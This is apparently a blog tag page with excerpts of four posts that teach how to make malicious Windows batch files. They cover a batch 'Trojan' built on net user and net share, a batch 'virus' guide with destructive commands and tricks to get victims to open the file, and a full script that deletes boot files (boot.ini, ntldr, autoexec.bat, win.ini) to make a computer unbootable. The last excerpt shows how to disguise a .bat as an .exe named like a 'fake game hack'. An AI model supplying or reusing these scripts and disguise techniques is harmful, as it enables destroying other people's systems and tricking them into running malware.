Friday, November 1
Shadow

Tag: .bat

Making your own Trojan in bat file in windows

Technology
Open a dos prompt we will only need a dos prompt and windows xp operating system -Basics- Opening a dos prompt -> Go to start and then execute and type cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] In this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat fi...

How to Make a batch virus using Notepad

Technology
How to build a simple .bat virus Index 1. Tools 2. What makes a virus a virus 3. Making your first batch file 4. Making a batch virus 5. Destructive commands 6. Most common tricks used to make someone open the file 1. Tools To make a batch program you will need a text program (ex. Word,notepad,wordpad etc..) A keyboard if you don't have one you can use the ON-screen keyboard To get to the on-screen keyboard start>all programs>accessories>accessibility 2. What makes a virus a virus When people think of a virus they think of a computer virus but the word virus came from a virus that's in your body. They also think a virus is meant to de...

Shut Down Anyone's Computer Forever…

Technology
@echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini Open up notepad and copy and paste that. Save it as a .bat file. This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)   Technorati Tags: .bat,shutdown,batch file

Change your .bat file to .exe

Technology
when it is in .exe form no one will be able to change look or modify the code (note:it will make it to a self extraction thing but it will still act like a exe) This is how you make it to a .exe goto to start run and type C:WINDOWSsystem32 find a program called iexpress.exe STEP BY STEP ON HOW TO USE IT click create new self extraction then next. click extract files and run an installation command and click next. type what you want to name the files (ex. hello,virus,fake game hack) then click next. click no prompt then next. license agreement unless you want to put one click do not display license. package files(most important) click add then choose your .bat file(also does .vbs files) then click next. under install program choose your .bat or ...